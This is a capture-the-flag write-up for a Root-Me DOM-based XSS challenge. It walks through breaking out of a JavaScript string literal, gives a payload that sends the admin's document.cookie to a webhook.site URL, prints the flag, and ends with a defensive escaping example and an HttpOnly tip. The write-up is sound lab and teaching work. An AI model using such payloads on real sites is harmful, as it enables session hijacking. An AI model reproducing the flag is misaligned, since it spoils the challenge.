Challenge Info
🧨 Challenge name ==> XSS DOM Based - Introduction
🧠 Challenge Diff ==> Medium
💯 Challenge Score ==> 35
📝 Challenge Desc ==> Steal the admin's session cookie.
📚 Challenge Category ==> Web - Client
👾 Challenge flag format ==> rootme{...sOmeTHings...}

At first, I visited the challenge URL and saw this page:
OK, I see two paths. The first path is Contact, for contacting the admin (I use this form to hijack the admin's cookie),
and the next path is the main page with an input.
Next, I entered a random number like 10 in the input, and now I see this script in the source.
<script>
    var random = Math.random() * (99);
    // The value of the ?number= parameter is placed inside this string literal
    var number = '10';
    if(random == number) {
        document.getElementById('state').style.color = 'green';
        document.getElementById('state').innerHTML = 'You won this game but you don\'t have the flag ;)';
    }
    else{
        document.getElementById('state').style.color = 'red';
        document.getElementById('state').innerText = 'Sorry, wrong answer ! The right answer was ' + random;
    }
</script>

Easy! Now I need to send this exploit:
http://challenge01.root-me.org/web-client/ch32/?number=10%27;alert(origin);//
Niiiicee!! 🎉 Now I have found an XSS vulnerability. OK, the next step is to hijack the admin's cookie. But how? The answer is the contact form. For hijacking the cookie I use Webhook.
Webhook.site is a simple service to capture and inspect HTTP requests in real time.
When the admin clicks on this exploit:
http://challenge01.root-me.org/web-client/ch32/?number=10%27;document.location = `https://webhook.site/WEBHOOK_ID?cookie=${document.cookie}`;//
After a few seconds, I got it 😈:

Flag
rootme{XSS_D0M_BaSed_InTr0}
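
Why the first payload above breaks out of the string, and how the page could emit the value safely. This is an added example, not the challenge's code or part of the original write-up. The function names are hypothetical, and `renderVulnerable` only models the `var number = '...'` line seen in the page source; `alert` and `origin` are constructed stubs so it runs outside a browser.

```javascript
// Payload from the write-up's first URL, with %27 decoded to a single quote.
const PAGE_PAYLOAD = "10';alert(origin);//";

// Vulnerable pattern (assumed model of the page): the raw parameter is pasted
// between single quotes, so a quote in the input ends the string literal.
function renderVulnerable(number) {
  return "var number = '" + number + "';";
}

// Hardened: serialise the value as a JS string literal, then escape the
// characters that could close the literal's surrounding <script> element.
function jsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(number) {
  return 'var number = ' + jsLiteral(number) + ';';
}

// Evaluate a rendered script with stubbed alert/origin and report whether
// injected code ran and what value ended up in `number`.
function evaluate(script) {
  const calls = [];
  const run = new Function('alert', 'origin', script + '\nreturn number;');
  const number = run((x) => calls.push(x), 'constructed-origin');
  return { number, alertCalls: calls.length };
}

for (const render of [renderVulnerable, renderHardened]) {
  const script = render(PAGE_PAYLOAD);
  console.log(render.name, '=>', script, evaluate(script));
}
```

With the hardened form the whole payload stays inside `number` as data. Independently of that fix, marking the session cookie `HttpOnly` keeps it out of `document.cookie`, which is what the second payload reads.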